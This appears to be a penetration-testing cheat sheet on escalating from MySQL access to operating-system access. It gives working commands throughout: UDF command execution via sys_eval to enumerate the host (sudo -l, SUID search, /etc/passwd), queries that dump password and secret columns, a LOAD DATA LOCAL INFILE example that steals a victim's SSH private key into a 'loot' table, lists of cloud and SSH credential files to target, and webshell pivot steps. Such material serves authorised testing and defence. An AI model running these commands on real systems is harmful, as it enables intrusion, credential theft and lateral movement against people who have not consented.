MySQL is often a bridge between application access and operating system access.
The service itself is not automatically a root shell. We prove the primitive, identify the OS account, then decide whether privilege escalation or lateral movement is available.
From Database Access To OS Access
Primary chains:
FILE + webroot write -> webshell -> web server user
FILE + plugin_dir write -> UDF -> MySQL service account
LOCAL INFILE -> client-side file theft -> credential reuse
database dump -> credentials -> SSH/RDP/app/admin panels
UDF Privilege Escalation Reality
UDF command execution runs as the MySQL service account.
Check context immediately:
SELECT sys_eval('id');
SELECT sys_eval('whoami');
SELECT sys_eval('hostname');
Impact depends on that OS account:
| Service Context | Likely Impact |
|---|---|
mysql user | Local foothold, data access, possible privesc through writable scripts, backups, cron, sudo, weak file permissions. |
root | Direct host compromise. Rare and severe. |
| Windows service account | Host/domain impact depends on local privileges and domain rights. |
| XAMPP/local dev service | Often higher file-system write access and webshell paths. |
Local Privilege Escalation From MySQL Context
After UDF RCE, enumerate like any local shell:
SELECT sys_eval('id');
SELECT sys_eval('sudo -l');
SELECT sys_eval('find / -perm -4000 -type f 2>/dev/null');
SELECT sys_eval('find / -writable -type d 2>/dev/null | head');
SELECT sys_eval('cat /etc/passwd');
Look for:
- writable webroots
- writable backup scripts
- writable cron paths
- database backups containing credentials
- application config files
- SSH keys readable by the service account
- password reuse between MySQL and OS accounts
Credential Reuse
Dump application credentials:
SELECT * FROM users LIMIT 10;
SELECT username, password FROM users;
Search config-like tables:
SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
OR column_name LIKE '%token%'
OR column_name LIKE '%secret%'
OR column_name LIKE '%key%';
Try recovered credentials against:
SSH
RDP
admin panels
other databases
CI/CD
cloud consoles
backup systems
LOCAL INFILE As Lateral Movement
LOCAL INFILE can steal files from the connecting client.
High-value client-side targets:
/var/www/html/config.php
/home/user/.ssh/id_rsa
/home/user/.aws/credentials
/home/user/.kube/config
C:\Users\user\.aws\credentials
C:\Users\user\.ssh\id_rsa
Example:
CREATE TABLE loot(line TEXT);
LOAD DATA LOCAL INFILE '/home/victim/.ssh/id_rsa'
INTO TABLE loot
FIELDS TERMINATED BY '\n';
This is lateral movement because the database interaction reaches into the client's filesystem rather than the server's filesystem.
Webshell To Host Pivot
If OUTFILE lands a webshell:
database user -> webroot file write -> web server code execution -> OS user
Immediate checks from the webshell:
id
whoami
hostname
pwd
ls -la
cat application config files
The next pivot is usually credential theft from application config, SSH keys, deployment files, or database backups.